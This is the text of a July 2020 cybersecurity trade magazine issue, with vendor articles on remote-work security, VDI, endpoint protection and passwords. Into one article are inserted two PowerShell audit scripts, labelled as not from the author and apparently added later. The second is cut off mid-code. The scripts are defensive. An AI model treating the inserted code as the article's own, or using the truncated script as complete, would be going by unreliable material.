Cyber Defense eMagazine July 2020 Edition
Cyber Defense eMagazine July Edition for 2020 #CDM #CYBERDEFENSEMAG @CyberDefenseMag by @Miliefsky, a world-renowned cyber security expert and the Publisher of Cyber Defense Magazine as part of the Cyber Defense Media Group, as well as Yan Ross, US Editor-in-Chief, Pierluigi Paganini, Co-founder & International Editor-in-Chief, Stevin Miliefsky, President, and many more writers, partners and supporters who make this an awesome publication! Thank you all and to our readers! OSINT ROCKS! #CDM #CDMG #OSINT #CYBERSECURITY #INFOSEC #BEST #PRACTICES #TIPS #TECHNIQUES
Security, Convenience & Privacy: A Neverending War
Is the New Normal Workspace Secure?
3 Practices to Avoid Security Risk in A Work from Home World
7 Security Precautions to Protect Remote Workers
…and much more…

Cyber Defense eMagazine – July 2020 Edition 1
Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.
CONTENTS

Welcome to CDM’s July 2020 Issue (p. 7)

Security, Convenience & Privacy: A Neverending War (p. 24)
By Michael Covington, VP of Product Strategy, Wandera

Is the New Normal Workspace Secure? (p. 26)
By Simon Townsend, CMO, IGEL

3 Practices to Avoid Security Risk in A Work from Home World (p. 29)
By Akshay Bhargava, Chief Product Officer, Malwarebytes

7 Security Precautions to Protect Remote Workers (p. 32)
By Marty Puranik, President & CEO, Atlantic.Net

The Race to Pivot Around Remote Work and The Emergence Of SASE (p. 36)
By Amit Bareket, CEO and Co-Founder of Perimeter 81

Organizations: It’s Time to Rethink How You Protect Environments from Within (p. 39)
By Richard Melick, senior technical product manager, Automox

Don’t Be Breached When Using Commercial Software Products (p. 42)
By Randy Reiter, CEO of Don’t Be Breached

Is Proactive Insider Risk Mitigation Possible? (p. 44)
By David A. Sanders, Director of Insider Threat Operations, Haystax

Benefits of A Security Operation Center (SOC) (p. 50)
By Pedro Tavares, Editor-in-Chief, seguranca-informatica.pt

In 2020, SOCs Are Understaffed Yet Overconfident in Ability to Detect Cyberthreats (p. 53)
By Steve Moore, chief security strategist, and Samantha Humphries, senior product marketing manager, Exabeam

Software-Defined Perimeters Offer Secure Connectivity to Smart Cities (p. 60)
By Don Boxley, CEO and Co-Founder, DH2i (www.dh2i.com)

Managing Small Business Cybersecurity During Covid-19 (p. 63)
By Bill DeLisi, CEO of GOFBA

IOT Security Embedded in Memory Cards (p. 66)
By Hubertus Grobbel, Vice President Security Solutions, Swissbit

How To Fight A Virus: Lessons From Cybersecurity (p. 70)
By Yotam Gutman, SentinelOne

How to Combat Cybersecurity Attacks & Cyber Warfare (p. 74)
By Adnan Olia, Chief Operating Officer and Co-owner of Intradyn

COVID-19 And the Easyjet Hack - A Perfect Phishing Storm (p. 78)
By Shachar Daniel, Safe-T’s CEO

Should We Be Worried About Vehicle Hacking? (p. 81)
By Martin Banks

Cyber Attacks at Sea: Blinding Warships (p. 85)
By Julien Chesaux, Cyber Security Consultant, Kudelski Security

iPhone Extraction Without A Jailbreak (p. 92)
By Oleg Afonin, Security Researcher, ElcomSoft Co. Ltd.

How to Maintain Anonymity in Communications? (p. 96)
By Milica D. Djekic

Everything You Want to Know About Single Sign-On (p. 100)
By Ayman Totounji, Founder, Cynexlink

A Passwordless Future: Will Biometric Identification Replace Passwords? (p. 106)
By Joshua Frisby, Founder of PasswordManagers.co

Post COVID-19: Cloud, Remote Work and BYOD Security Predictions (p. 111)
By Anurag Kahol, CTO and co-founder, Bitglass

The Rise of COVID-19 Phishing Attacks: How Cyber Adversaries Are Adopting Phishing to Generate New Threat Vectors (p. 113)
By Brad Slavin, CEO of DuoCircle LLC

Post COVID-19: Password Extinction Accelerated; Telemedicine Spurs Fraud (p. 117)
By Robert Prigge, CEO of Jumio

The Future Of Security – Predictions Post COVID-19 (p. 119)
By Mike Riemer, Pulse Secure, Global Chief Security Architect

Post COVID-19 Cybersecurity and Future-of-Work Predictions (p. 121)
By Chris DeRamus, VP of Technology, Cloud Security Practice, DivvyCloud by Rapid7

Building A Telework Health Scorecard To Meet Surge Requirements And Long-Term Resiliency (p. 124)
By Stan Lowe, Global Chief Information Security Officer, Zscaler

CERT Warns Bad Actors Are Targeting Remote Access – How Security Operations Find And Route These “Below The Radar” Attacks (p. 128)
By Saryu Nayyar, CEO, Gurucul

CRYPTO (p. 130)
By Staford Titus S
@MILIEFSKY
From the Publisher…
New CyberDefenseMagazine.com website, plus updates at CyberDefenseTV.com & CyberDefenseRadio.com

Dear Friends,

Since last month, we’ve seen a continuation and deepening of the effects of COVID-19 on nearly all enterprises which depend on cyberspace for their operations. Both the articles in this month’s magazine and our daily publications, as well as news from nearly all channels, reflect the challenges of maintaining security in an ever-growing dependence on cyber-related systems of all kinds.

At the same time as the “normal” operations of enterprises across the board deal with these issues on a daily basis, one major periodic phenomenon is coming into sharp focus. The election cycle in the United States is upon us, with a mere 4 months until the presidential election.

There is little doubt that electronic activities will have a significant effect on the outcome of the election. Already forces from both legitimate and illicit entities are manifesting their influence. From social media to traditional news and commentary outlets, both attackers and defenders appear to be gearing up.

The apparent result of reopening of various States and municipalities has been described as a resurgence of the first wave of COVID-19 as well as an incipient second wave. Whichever it is, the effects upon widespread operations in the marketplace and the more focused impact on the electoral campaigns are undeniable. We will continue to watch closely and report further developments.

We are pleased to continue providing the powerful combination of monthly eMagazines, daily updates and features on the Cyber Defense Magazine home page, and webinars featuring national and international experts on topics of immediate interest.

Warmest regards,

Gary S. Miliefsky, CISSP®, fmDHS
CEO, Cyber Defense Media Group
Publisher, Cyber Defense Magazine

P.S. When you share a story or an article or information about CDM, please use #CDM and @CyberDefenseMag and @Miliefsky – it helps spread the word about our free resources even more quickly.
@CYBERDEFENSEMAG
CYBER DEFENSE eMAGAZINE
Published monthly by the team at Cyber Defense Media Group and distributed electronically via opt-in Email, HTML, PDF and Online Flipbook formats.
InfoSec Knowledge is Power. We will always strive to provide the latest, most up to date FREE InfoSec information.

From the International Editor-in-Chief…

The international effects of recent medical and political developments continue to show up prominently in the world of cybersecurity. We see a continuation of trends in Coronavirus effects, cyber-criminal activity, and government actions in response to these threats.

International effects of COVID-19 include restrictions on physical travel, resulting in greater dependence on cyber “travel” to accomplish necessary business and government functions. As might be expected, the expanded reliance on cyber assets also provides greater opportunities for criminal activity.

We may also note the divergence in approaches between the European model, using an integrated set of laws and regulations, on one hand, and the U.S. model, which tends to respond to these challenges on a State-by-State basis, on the other. I hasten to add there are some indications of movement on the federal level to adopt national privacy laws which would provide a greater measure of conformity.

As I observed last month, failure to work together in a cooperative fashion can only provide more opportunities for the abuse and misuse of sensitive information, even leading to the compromise of the command and control systems of our critical infrastructure.

Accordingly, may I suggest that in the days ahead we agree to put our differences aside in favor of responding to our common enemies: the COVID-19 virus itself and those who would take advantage of this crisis to perpetrate criminal schemes.

To our faithful readers, we thank you,
Pierluigi Paganini
International Editor-in-Chief

PRESIDENT & CO-FOUNDER
Stevin Miliefsky
stevinv@cyberdefensemagazine.com

INTERNATIONAL EDITOR-IN-CHIEF & CO-FOUNDER
Pierluigi Paganini, CEH
Pierluigi.paganini@cyberdefensemagazine.com

US EDITOR-IN-CHIEF
Yan Ross, JD
Yan.Ross@cyberdefensemediagroup.com

ADVERTISING
Marketing Team
marketing@cyberdefensemagazine.com

CONTACT US:
Cyber Defense Magazine
Toll Free: 1-833-844-9468
International: +1-603-280-4451
SKYPE: cyber.defense
http://www.cyberdefensemagazine.com

Copyright © 2020, Cyber Defense Magazine, a division of CYBER DEFENSE MEDIA GROUP (a Steven G. Samuels LLC d/b/a), 276 Fifth Avenue, Suite 704, New York, NY 10001. EIN: 454-18-8465, DUNS# 078358935. All rights reserved worldwide.

PUBLISHER
Gary S. Miliefsky, CISSP®
Learn more about our founder & publisher at: http://www.cyberdefensemagazine.com/about-our-founder/

8 YEARS OF EXCELLENCE!
Providing free information, best practices, tips and techniques on cybersecurity since 2012, Cyber Defense Magazine is your go-to source for Information Security.
We’re a proud division of Cyber Defense Media Group: CYBERDEFENSEMEDIAGROUP.COM
MAGAZINE TV RADIO AWARDS
Welcome to CDM’s July 2020 Issue
From the U.S. Editor-in-Chief

Once again, the July issue of Cyber Defense Magazine brings readers over two dozen articles on cyber and security topics of immediate interest. We are fortunate to rely on a broad spectrum of contributors who share their expertise and insights with our community.

We tend to look for trends and upcoming challenges and responses. For both individual consumers and corporate participants, the establishment of a “value proposition” is the cogent answer to the question “What problem does it solve?”

This month, readers will see elaboration of issues beyond the standard “cybersecurity” problems to solve. For instance, the impact of the broad collection of sensitive personal data in controlling the spread of COVID-19 potentially calls for strong protections of individual privacy. At some point, a balance must be reached between the privacy needs of the individual and the “greater good,” a rhetorical construct which can often lead to unintended adverse consequences.

The migration of workers to a permanent home-based operation appears to require more permanent cybersecurity solutions than just a temporary setup with expectations for workers to return to the more secure environment of HQ.

The age-old saying that “the only constant is change” holds true in these times, as demonstrated by the breadth and depth of the articles we are pleased to bring you this month.

Wishing you all success in your cyber security endeavors,

Yan Ross
US Editor-in-Chief
Cyber Defense Magazine

About the US Editor-in-Chief

Yan Ross, J.D., is a Cybersecurity Journalist & US Editor-in-Chief for Cyber Defense Magazine. He is an accredited author and educator and has provided editorial services for award-winning best-selling books on a variety of topics. He also serves as ICFE's Director of Special Projects, and is the author of the Certified Identity Theft Risk Management Specialist® XV CITRMS® course. As an accredited educator for over 20 years, Yan addresses risk management in the areas of identity theft, privacy, and cyber security for consumers and organizations holding sensitive personal information. You can reach him via his e-mail address at yan.ross@cyberdefensemediagroup.com
Your website could be vulnerable to outside attacks. Wouldn’t you like to know where those vulnerabilities lie? Sign up today for your free trial of WhiteHat Sentinel Dynamic and gain a deep understanding of your web application vulnerabilities, how to prioritize them, and what to do about them. With this trial you will get:

An evaluation of the security of one of your organization’s websites
Application security guidance from security engineers in WhiteHat’s Threat Research Center
Full access to Sentinel’s web-based interface, offering the ability to review and generate reports as well as share findings with internal developers and security management
A customized review and complimentary final executive and technical report

Click here to sign up at this URL: https://www.whitehatsec.com/info/security-check/
PLEASE NOTE: Trial participation is subject to qualification.
Security, Convenience & Privacy: A Neverending War
By Michael Covington, VP of Product Strategy, Wandera

The veritable “Sophie’s Choice” among security decision-makers has increasingly become the three-way tug-of-war between security, convenience and privacy. With the introduction of the General Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA) in 2018, there’s a clear global trend toward prioritizing consumer privacy. However, the COVID-19 pandemic has spurred unprecedented numbers of remote employees, leaving organizations grappling with a novel set of security challenges. Yet according to Verizon’s Mobile Security Index 2020 (MSI), organizations continue to sacrifice security, with 52 percent of respondents citing convenience as a top reason to let security take a backseat.

When GDPR took full effect in 2018, it was tangible evidence that people were ready to take more control over their personal data. The terms of GDPR require organizations to ensure that the personal information gathered during normal business transactions remains protected while still respecting the privacy rights of data owners, reflecting a heightened concern over personal data privacy. The passing of the California Consumer Privacy Act (CCPA) in the same year was further confirmation that consumers were concerned about where and how their personal data was being used, and legislators affirmed they were within their rights to know.

So the pressure on organizations to remain transparent while simultaneously protecting the security of their employees and users has been steadily building, leaving business and security leaders at a crossroads. The question remains: how are organizations to choose between security, convenience, and privacy when it comes to their employees and customers alike?
Industry giants have approached this ongoing dilemma in different ways. Particularly as it pertains to mobile security, Microsoft has tackled this challenge with the implementation of Mobile Application Management without enrollment (MAM-WE). As work environments become increasingly remote, organizations face an entirely new security landscape that will require them to adapt to BYOD scenarios. MAM-WE gives organizations the ability to manage individual apps to protect sensitive employee data, even on a personal device, in a setting outside the office. Microsoft’s offering is just one example of the ways companies have broached the issue of security without sacrificing convenience and privacy.

Roughly 24 percent of the full-time U.S. workforce worked remotely for at least a portion of their workweek in pre-pandemic days, but that number is steadily rising as a result of COVID-19. It’s now critical that security decision-makers not overlook the importance of mobile and cloud security in this evolving landscape. Our own analysis shows that as of March 30, the number of connections to collaboration tools like Zoom and Microsoft Teams had increased by 109% since the first week of February.

As Verizon’s Bryan Sartin put it, “The types of devices, diverse applications and further emergence of IoT devices further complicate security. Everyone has to be deliberate and diligent about mobile security to protect themselves and their customers.” This reiterates the sentiment that leaders will have to recognize the inherent risks of increasingly mobile and cloud-connected environments and take proactive action.

There is a way to strike a balance: a convenient user experience that also maintains the security and privacy of users. One recommendation would be for organizations to put policies in place that utilize offerings like Wandera Private Access or MAM-WE to ensure that the security of corporate data is not compromised, even when employees use a personal device. Outlining and adopting formal acceptable use policies within organizations will also be a step toward finding this balance.

The findings from recent mobile threat research indicate that decision-makers still believe they have to choose between security, convenience, and privacy for their organizations. But with more privacy-preserving and user-friendly security solutions becoming available, a harmonizing middle ground can be found. It’s time to leave in the past the notion that organizations can’t have all three, and focus on solutions that allow for the security, convenience and privacy trifecta moving forward.

About the Author

Michael J. Covington, Ph.D., is a seasoned technologist and the Vice President of Product Strategy for Wandera, a leading provider of mobile security. Michael is a hands-on innovator with broad experience across the entire product life cycle, from planning and R&D to executing on company strategies. He previously held leadership roles at Intel Labs, Cisco Security, and Juniper Networks. With a diverse background as a published computer science researcher and as an IT professional, Michael has experienced technology from all sides and enjoys bringing innovations to the market, specifically in the areas of mobility and connectivity. He can be reached at @MJCovington and at https://www.wandera.com/
Is the New Normal Workspace Secure?<br />
Remote working has accelerated the need to better secure endpoints everywhere<br />
By Simon Townsend, CMO, IGEL<br />
Just a few years ago we were predicting Desktop-as-a-Service (DaaS) would soon have its day as<br />
enterprises were looking for a way to keep up with the BYOD, multi-device, and user mobility movements.<br />
It was time to rethink the ‘desktop’ from a fixed-location to a fluid endpoint that could be anywhere – one<br />
which could exist as any device, and increasingly delivered virtually. Fast-forward to today and the<br />
COVID-19 crisis, and the need to adopt a more modern approach to managing and securing the endpoint<br />
has become painfully clear.<br />
Enterprises have had to pivot overnight to a workforce sheltering in place with people working remotely<br />
on a variety of devices that may or may not have been up to date on security protocols. With evidence<br />
mounting that companies like Twitter are blessing working remote as a regular option going forward,<br />
there are a few conclusions: 1) the workspace has to be digital since people are using multiple devices,<br />
on site or remotely, 2) endpoint security needs to embrace this new work model and close all security<br />
gaps, 3) DaaS and the cloud will become even more important to deliver consistent, secure user<br />
experiences, and 4) Virtual Desktop Infrastructure (VDI) continues to be an optimum strategy for<br />
maintaining system integrity from endpoints to the data center or cloud.<br />
VDI and DaaS Up to the Task<br />
New pressures on IT teams in response to the evolving COVID-19 recovery are not going to come with<br />
bigger budgets or more staff. The increased need to improve security and ensure any asset used<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 26<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
remotely is governed correctly via user profiles, associated policies, and access control, all while<br />
supporting productivity, is added to the day-to-day IT process challenges businesses face. In a recent<br />
survey of IT professionals, Enterprise Strategy Group (ESG) found that, after software licensing, inventory and<br />
compliance, the main challenges in delivering a full-featured desktop centered on the pace of change<br />
(30%), troubleshooting issues (29%) and operational costs (29%).<br />
VDI and DaaS offer solutions to these IT challenges, with the benefit of maintaining a high level of security<br />
without impacting user productivity. As ESG notes, businesses have implemented virtual desktop<br />
infrastructure (VDI) and desktop-as-a-service (DaaS) to enable remote employees, but only a small<br />
percentage of the employee base made use of this technology. Prior to COVID-19, neither technology<br />
had reached a high deployment percentage within organizations. The ESG survey found that 40% of<br />
respondents indicated their organization currently uses VDI technology, and a further 25% are on the verge of<br />
doing so. Similarly, ESG found 39% of respondents reported DaaS usage, with an increase planned. Post<br />
COVID, ESG’s expectation is that these deployments will rise to accommodate the changing work<br />
environment.<br />
Answering the Rise of Security Questions<br />
The new business landscape has sharpened the focus on the digital workspace, to make sure the basics<br />
of data security and risk mitigation are handled at the level needed to ensure business continuity. A more<br />
remote workforce has shown how essential endpoint management and security is to business survival.<br />
Businesses are looking at:<br />
1. Balancing the need for access policy controls with employees’ desire to use more BYOD devices<br />
remotely. The ESG survey found a significant disconnect: while 79% of organizations believe VDI<br />
and DaaS are more secure than traditional desktop provisioning, 65% of the respondents will<br />
have restrictions on the devices used to access VDI or DaaS workspaces. These businesses are<br />
not ready to adopt a policy in which employees are allowed to use personal devices. While they<br />
perceive VDI or DaaS as superior options, they draw the line at employee-owned devices.<br />
2. Embracing a digital workspace solution like Citrix Workspace to further enable secure remote<br />
access. Remote application and desktop delivery, and access to web- and cloud-based DaaS<br />
apps via a secure browser, paired with secure endpoint management software, will enable<br />
employees to access their user profile regardless of location. Whether using the cloud or DaaS,<br />
workloads and sensitive data are protected.<br />
3. Maintaining a high level of security without impacting user productivity. The ESG survey found<br />
improving employee collaboration to be a top priority in delivering desktop environments, followed<br />
closely by detecting security incidents, vulnerabilities, and risk, and managing user expectations<br />
of access, device choice, and application preferences. An effective solution is a next-gen,<br />
secure Linux OS on endpoints that can be auto-configured based on predefined profiles for simple<br />
user access. Device-agnostic, this type of advanced endpoint software can enable organizations<br />
to secure all those remote BYOD devices without fear of security risk.<br />
Making the New Normal Environment Safe<br />
IT teams are certainly faced with an unprecedented list of challenges this year. However, the tools to<br />
secure the new hybrid environment of more people working remotely fortunately do exist. VDI providers<br />
like Citrix are proven options for secure, device-agnostic desktop delivery. DaaS gives organizations<br />
another route to deliver applications via the cloud, on demand and securely, enabling business continuity<br />
in the case of a disruptive event. Advanced endpoint management software is already in successful<br />
deployment, enabling workers to access their user profiles via the cloud, while IT policy controls are<br />
executed to support network security.<br />
Regardless of the system chosen, VDI or DaaS, the task is clear: organizations will need to embrace the<br />
use of more personal and BYOD devices, coupled with advanced security software to manage the<br />
changing work culture.<br />
About the Author<br />
Simon Townsend is global chief marketing officer for IGEL, provider of the<br />
next-gen edge OS for cloud workspaces.<br />
3 Practices to Avoid Security Risk in A Work from Home<br />
World<br />
By Akshay Bhargava, Chief Product Officer, Malwarebytes<br />
Well before COVID-19 hastened people working from home, users embraced “bring your own device”<br />
(BYOD) practices. It created a proliferation of work-connected personal mobile devices that have become<br />
a regular part of our workplace fabric. But today, as the workplace has shifted to our homes, employees<br />
are now practicing a “use your own device” (UYOD) approach which means even more personal devices<br />
are connecting to company networks.<br />
Like BYOD, UYOD enables employees to be connected to work when they want, and over any device<br />
they have on hand – empowering them with the flexibility and access they need to work at home. But<br />
one concern still prevails: how to ensure proper security protocols are set and stringently followed in<br />
order to provide the same level of security that corporate-owned devices bring.<br />
The COVID-19 phenomenon brings personal endpoint device security concerns, once again, to the<br />
forefront. Undoubtedly these personal devices come with a wide range of risk: while some diligent<br />
employees may fastidiously follow security protocols, others that don’t take cybersecurity threats as<br />
seriously will inadvertently expose their devices to bad actors. This uneven security posture comes at a<br />
time when research shows the volume of global threats against business endpoints has increased by 13<br />
percent year-over-year. From an increase in enterprise-focused threats to the diversification of<br />
sophisticated hacking and stealth techniques, cybercrime is clearly targeting organizations with<br />
increasing vengeance. And working from home on personal devices further elevates this risk.<br />
Improving UYOD Security<br />
While all organizations face increasing risk at the endpoint, small-to-medium sized businesses (SMBs)<br />
are particularly vulnerable to a cyberattack. How could they not be when they are operating on thinner<br />
margins, with limited IT staff and smaller financial reserves than enterprises? To minimize security risk,<br />
SMBs need to put these practices in place when personal devices are being used to access business<br />
data:<br />
Embrace a Cultural Security Mindset. One of the obstacles to getting personal device security<br />
under control is the mindset that someone else, usually IT, ‘owns’ the cybersecurity and data<br />
protection problem. Even though 70 percent of data breaches are known to start at the endpoint,<br />
this data point isn’t translating into the average employee or contractor’s consciousness.<br />
No matter how strong defenses are, users can introduce threats to a company’s networks by:<br />
• Falling for phishing scams<br />
• Posting secure information on social media<br />
• Inadvertently giving away credentials<br />
Employees will more enthusiastically embrace BYOD/UYOD security protocols if management<br />
has effectively communicated not only the how behind day-to-day practices to prevent malware<br />
or other attacks, but also why mitigating risks is so critical. Acceptable use guidelines might<br />
include:<br />
• How to detect social engineering tactics and other scams<br />
• What constitutes acceptable Internet usage<br />
• How remote workers should securely access the office network<br />
• How to properly use password management systems<br />
• How to report security incidents according to their urgency<br />
To encourage employees to adopt ownership of their own device security, it’s important to note<br />
smaller enterprises thrive on being more nimble. This ‘get it done now’ mentality can lead to<br />
applications being put into play before being thoroughly vetted for access controls and may cause<br />
a rise in “shadow IT” which may not meet organizational security standards. It can also lead to<br />
‘rogue’ assets, or personal devices being deployed without full vetting for risks.<br />
The recent wholesale shift to remote working has highlighted this risk more than ever as personal<br />
device use explodes. When communicating with employees, there needs to be a careful balance<br />
between asking them to be more mindful of security and realizing their first goal is always to get<br />
their work done. Communication and education here are essential to individual participation in<br />
helping mitigate risk at the endpoint.<br />
Optimize Limited Resources. With limited IT staff, and often no dedicated security staff, SMBs will<br />
be looking to guard against the increased security risks from COVID-19 by executing strategic<br />
security initiatives for newly remote workers and supporting long-term viability. One critical need<br />
in threat defense is endpoint detection and response (EDR) software. EDR is vital to containing<br />
a costly breach that could financially devastate an SMB or enterprise. EDR can help<br />
security teams contain, investigate and respond to threats that may have bypassed other<br />
defenses like antivirus tools. An effective EDR solution can provide automated analysis of data to<br />
identify suspicious activity, enabling IT to make a timely decision on the threat level and take quick<br />
action accordingly.<br />
Simplifying personal endpoint device protection is also imperative. Managing protection for many<br />
devices, given scarce resources, demands centralized management from a single pane of glass<br />
to provide real time protection and on-demand remediation. Many SMBs may also consider<br />
outsourcing their security needs to a managed service provider (MSP) in order to free up<br />
resources, but this should not take the place of employee security training.<br />
Apply Privacy Protection. As users work from home, they need an extra layer of protection to stop<br />
cyberattack risk – as they are no longer behind the security of your corporate network. This is<br />
where the value of a virtual private network (VPN) comes into play. This important, and often<br />
overlooked, layer of defense ensures that a user’s IP address is private, secure, and encrypted,<br />
helping to protect your business data.<br />
Serving as a digital middleman between the user and the Internet, a VPN can deter hacking and<br />
unauthorized tracking which will help prevent employees from being cyberthreat targets. It works<br />
like an encrypted tunnel between the user and your data, keeping away the prying eyes of threat<br />
actors looking to access your business data – including passwords, personally identifiable<br />
information (PII), customer information, credit card numbers and more. By employing a VPN, you<br />
can limit the risk of employees working from their personal networks while protecting critical<br />
business and customer information.<br />
Post-COVID Environment<br />
Eventually employees will begin returning to work onsite, but this crisis has demonstrated the benefits of<br />
working at home. This means that the heightened use of personal devices for business is here to stay.<br />
SMBs can manage this new working reality by improving employee communication on threat prevention,<br />
creating a strategy to more thoroughly record and protect assets, and implementing the protection of a<br />
VPN to keep important business data away from prying eyes.<br />
In the longer term, all these security measures are going to be critical to economic viability.<br />
Cybercriminals have been exploiting COVID-19, but they will revert to other forms of cybercrime soon<br />
enough, and ransomware attacks, costly data breaches and business disruption will be back in the news.<br />
SMBs can avoid tragedy by implementing strong preventative anti-attack measures now.<br />
About the Author<br />
Akshay Bhargava is the Chief Product Officer at Malwarebytes, a leading<br />
provider of advanced endpoint protection and remediation solutions.<br />
7 Security Precautions to Protect Remote Workers<br />
By Marty Puranik, President & CEO, Atlantic.Net<br />
The COVID-19 pandemic has engulfed the world's population, crippled global economies, and changed<br />
the way of life for almost every single person in every single country around the world. Nearly six million<br />
infection cases have been confirmed. Over two million people have recovered, but over 350,000 deaths<br />
have been registered so far, and sadly this figure is expected to grow substantially in the coming days<br />
and weeks.<br />
Governments around the world have encouraged employees to work from home wherever possible.<br />
Frontline key workers are still required to continue their occupations but unfortunately, many millions<br />
have lost their jobs, and tens of millions have been furloughed on government financial aid.<br />
Currently, there is an enormous workforce engaged and actively working from home, keeping businesses<br />
alive in one of the biggest challenges to face a generation. Some reporters are referring to this shift in<br />
working behavior as the greatest work-from-home experiment.<br />
With this paradigm shift of working behavior, additional risks and security concerns must be considered<br />
to protect organizations from things like wire transfer fraud, ransomware, and exploitation. There is a vast<br />
amount of evidence to suggest that cybercriminals are out in force to take advantage of the COVID-19<br />
pandemic.<br />
The most common attack vectors seen in recent weeks are targeted and extensive phishing email<br />
campaigns and spoofing using SMS and mobile communications platforms such as WhatsApp.<br />
What can you do to protect your workforce and business from being compromised? We have compiled<br />
a list of some of the most effective measures to be undertaken to protect your organization.<br />
Make Sure Your Security Policy Is Valid<br />
The COVID-19 outbreak has highlighted that most organizations’ cybersecurity policies, especially<br />
policies regarding mobile computing and teleworking, may be inadequate. Businesses have been<br />
scrambling to change the guidelines to adapt to the pandemic. Very few organizations would have had a<br />
business continuity strategy that solved all the issues brought about by the seismic shift to home working.<br />
Specific policies to update may revolve around the physical protection of company IT equipment, such as making<br />
sure children or relatives do not use company assets, which also helps to keep assets in good working<br />
condition. If additional technology is needed by the employee, such as extra monitors, keyboards, or<br />
printers, a formal process should exist to track where company assets are located, for example logging a<br />
service desk ticket for management teams to approve the removal of company technology. This process<br />
greatly improves how assets can be tracked.<br />
Other control measures can be introduced or updated to define the organization's rules and regulations<br />
on the usage of laptops, computers, handheld tablets, mobile phones, and digital media, including disks<br />
and memory sticks.<br />
Keep Data Protection Relevant<br />
Maintaining data protection is critically important for organizations, even more so when employees are<br />
working from home. Organizations are duty-bound by government regulations to uphold data protection.<br />
The regulations still apply no matter where the employees are working, be that an office-based role, or<br />
when working from home.<br />
All laptops should have some form of data encryption software installed, such as Microsoft BitLocker.<br />
This software protects the data stored on the employee’s physical device. In the event a company device<br />
is lost or stolen, the data is secured and encrypted. Domain policies can force remote terminals to lock<br />
the screen after a few minutes of inactivity during the lockdown period.<br />
All portable equipment should have a machine or boot-up password, and should require a domain user account<br />
logon when powered up. This may be a BIOS-protected screen lock, or it might just be the<br />
Windows Logon utility. Either way, the device must not boot straight into the operating system without<br />
prompting for credentials. This will stop unauthorized access to the data stored on the equipment.<br />
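As an added example (not part of the author's article), the following PowerShell script audits a Windows laptop against the three controls just described: BitLocker on the system drive, an enforced screen lock, and a mandatory credential prompt at boot. It relies on the built-in BitLocker module, the registry value behind the "Interactive logon: Machine inactivity limit" security policy, and the Winlogon automatic-logon setting; the 600-second idle limit is an assumed threshold, not a figure from the article. A firmware (BIOS) password cannot be read from inside Windows, so that part of the check stays manual.<br />

```powershell
# Added example (not from the article): audit a Windows laptop against the
# controls described above: OS volume encrypted with BitLocker, screen lock
# enforced after a short idle period, and no automatic logon that would skip
# the credential prompt at boot. Requires the BitLocker module and an
# elevated session.

function Get-EndpointLockdownReport {
    param(
        # Longest idle period (seconds) accepted before the screen locks; assumed value
        [int]$MaxIdleSeconds = 600
    )

    $findings = New-Object System.Collections.Generic.List[string]

    # 1. BitLocker: the OS volume must be fully encrypted with protection turned on
    $osDrive = $env:SystemDrive
    $vol = Get-BitLockerVolume -MountPoint $osDrive -ErrorAction SilentlyContinue
    if ($null -eq $vol) {
        $findings.Add("BitLocker: cannot read status for $osDrive (module missing or not elevated)")
    }
    elseif ($vol.ProtectionStatus -ne 'On' -or $vol.VolumeStatus -ne 'FullyEncrypted') {
        $findings.Add("BitLocker: $osDrive is $($vol.VolumeStatus), protection $($vol.ProtectionStatus)")
    }

    # 2. Screen lock: machine-wide inactivity limit written by the
    #    'Interactive logon: Machine inactivity limit' security policy
    $sysPol = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $idle = (Get-ItemProperty -Path $sysPol -Name InactivityTimeoutSecs -ErrorAction SilentlyContinue).InactivityTimeoutSecs
    if (-not $idle -or $idle -gt $MaxIdleSeconds) {
        $findings.Add("Screen lock: InactivityTimeoutSecs is '$idle', expected 1..$MaxIdleSeconds")
    }

    # 3. Boot straight into the desktop: Winlogon AutoAdminLogon must be off
    $winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $auto = (Get-ItemProperty -Path $winlogon -Name AutoAdminLogon -ErrorAction SilentlyContinue).AutoAdminLogon
    if ($auto -eq '1') {
        $findings.Add("Logon: AutoAdminLogon is enabled, device will not prompt for credentials at boot")
    }

    # Firmware (BIOS/UEFI) passwords are not visible from Windows; check them by hand or with a vendor tool.
    [pscustomobject]@{
        Computer  = $env:COMPUTERNAME
        Compliant = ($findings.Count -eq 0)
        Findings  = $findings.ToArray()
    }
}

Get-EndpointLockdownReport | Format-List
```

Run it from an elevated prompt on each laptop, or wrap the function in an SCCM or Intune compliance script so that a non-compliant result blocks access to corporate resources rather than only producing a report.<br />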
Secure Physical Assets<br />
High-value assets must already have the standard security features such as usernames, passwords,<br />
and PINs. Extreme care should be taken with mobile computing being used outside of the organization’s<br />
premises. In the home environment, extra care should be taken to secure customer and organizational<br />
data.<br />
Protection should be in place to avoid unauthorized access or disclosure of the information stored and<br />
processed by the equipment. No other person should be able to access the equipment or view information<br />
on the screen, and you should guard against eavesdropping. Do not openly discuss confidential information or<br />
payment card information where you may be overheard.<br />
Create Strong Passwords<br />
Ensuring a strong and robust password protection policy might sound like common sense; however, the<br />
weakest point of security on a corporate network is the end user. Enforcing system-wide, managed<br />
password policies can help to create a hardened perimeter on the network.<br />
Support teams may have to do a little extra work to unlock and reset user accounts if the password is<br />
forgotten, but instilling a complex password policy, and a regular, enforced password expiration date will<br />
help to give the best protection to the remote workforce.<br />
Introducing multi-factor authentication (MFA) for home workers can add extra security for business<br />
assets. Using MFA to access cloud storage such as OneDrive, or when accessing Exchange email<br />
systems and collaboration tools such as Slack, Teams, or Skype for Business, will add an extra layer of<br />
security when out of the office.<br />
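As an added example (not from the article), the PowerShell function below checks a domain's default password policy against the recommendations above: complexity enforced, a bounded expiry period, and an account lockout threshold so that remote logons cannot be guessed indefinitely. It takes a policy object shaped like the output of the RSAT cmdlet Get-ADDefaultDomainPasswordPolicy, so it is shown first against a constructed sample and then against a live domain. The numeric thresholds are assumed values, not figures from the article; MFA is enforced in the identity provider and is out of scope for this check.<br />

```powershell
# Added example (not from the article): compare a domain password policy with
# the controls recommended above (complexity, expiry, lockout, history).
# Thresholds are assumed values.

function Test-PasswordPolicy {
    param(
        # Object carrying the properties returned by Get-ADDefaultDomainPasswordPolicy
        [Parameter(Mandatory)] $Policy,
        [int]$MinLength = 14,           # assumed
        [int]$MaxAgeDays = 90,          # assumed
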